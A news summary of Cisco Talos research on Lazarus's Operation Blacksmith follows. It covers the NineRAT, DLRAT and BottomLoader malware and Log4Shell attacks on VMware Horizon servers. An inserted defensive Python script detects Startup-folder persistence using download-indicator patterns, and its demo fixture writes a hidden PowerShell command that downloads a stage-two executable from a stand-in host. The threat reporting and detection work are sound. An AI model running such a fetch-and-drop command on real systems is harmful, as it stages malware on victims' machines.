The new malware consists of two remote access trojans, named NineRAT and DLRAT, and a malware downloader named BottomLoader.
The D programming language is rarely seen in cybercrime operations, so Lazarus probably chose it for new malware development to evade detection.
Operation Blacksmith represents a notable shift in tactics and tools used by Lazarus, serving as yet another demonstration of the threat group's ever-shifting tactics.
NineRAT, the first of the two novel RATs, is also the first piece of malware in the toolset.
It uses the Telegram API for command and control communication, including receiving commands and exfiltrating files from the breached computer.
NineRAT incorporates a dropper, which is also responsible for establishing persistence and launching the main binaries.
The second malware, DLRAT, is a trojan and downloader that Lazarus can use to introduce additional payloads on an infected system.
DLRAT's first activity on a device is to execute hard-coded commands that collect preliminary system information, such as OS details and the network MAC address.
Finally, Cisco's analysts discovered BottomLoader, a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell and establishes persistence for them by modifying the Startup directory.
BottomLoader offers Lazarus the capacity to exfiltrate files from the infected system to the C2 server, providing some operational versatility.
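As an added example (not from the Cisco Talos report or this article), a small defender-side check for the persistence pattern described for BottomLoader: a script in a Startup directory that invokes PowerShell to fetch a payload from a URL. The file names, file contents and indicator patterns are constructed assumptions; the page does not describe the actual artefacts the downloader drops.

```python
"""Constructed example: flag Startup-folder scripts that call PowerShell with a
download indicator. File names, contents and indicator regexes are assumptions,
not details taken from the report on BottomLoader."""
import os
import re
import tempfile

# Script types Windows will run from a Startup folder (assumed scope of the check).
SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js"}

# A PowerShell invocation plus a download/encoded-command indicator (assumed patterns).
POWERSHELL_RE = re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-RestMethod|\birm\b|-EncodedCommand",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def scan_startup_dir(path):
    """Return [(filename, url_or_None)] for scripts in `path` that invoke
    PowerShell together with a download indicator. Only scripts are read; the
    URL, when present, is extracted so an analyst can pivot on it."""
    findings = []
    for name in sorted(os.listdir(path)):
        if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
            continue
        with open(os.path.join(path, name), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        if POWERSHELL_RE.search(text) and DOWNLOAD_RE.search(text):
            match = URL_RE.search(text)
            findings.append((name, match.group(0) if match else None))
    return findings


def demo():
    """Build a constructed Startup folder (one suspicious script, two benign
    entries) in a temp directory and scan it."""
    folder = tempfile.mkdtemp()
    samples = {  # constructed sample files, not real artefacts
        "update.bat": 'powershell -WindowStyle Hidden -Command "Invoke-WebRequest '
                      '-Uri http://example.invalid/stage2 -OutFile stage2.exe"\n',
        "backup.cmd": "xcopy C:\\Data D:\\Backup /E /Y\n",
        "notes.txt": "not a script, ignored by the scan\n",
    }
    for name, body in samples.items():
        with open(os.path.join(folder, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_startup_dir(folder)
```

A real deployment would point `scan_startup_dir` at each user's and the all-users Startup folder and treat any hit as an alert to triage, not as proof of compromise.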
The attacks observed by Cisco Talos involve leveraging Log4Shell, a critical remote code execution flaw in Log4j, which was discovered and fixed approximately two years ago yet remains a security problem.
The targets are publicly facing VMware Horizon servers, which use a vulnerable version of the Log4j logging library, allowing the attackers to perform remote code execution.
Following the compromise, Lazarus sets up a proxy tool for persistent access on the breached server, runs reconnaissance commands, creates new admin accounts, and deploys credential-stealing tools like ProcDump and Mimikatz.
In the second phase of the attack, Lazarus deploys the NineRAT on the system, which supports a wide range of commands, as highlighted in the previous section.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Mon, 11 Dec 2023 21:30:07 +0000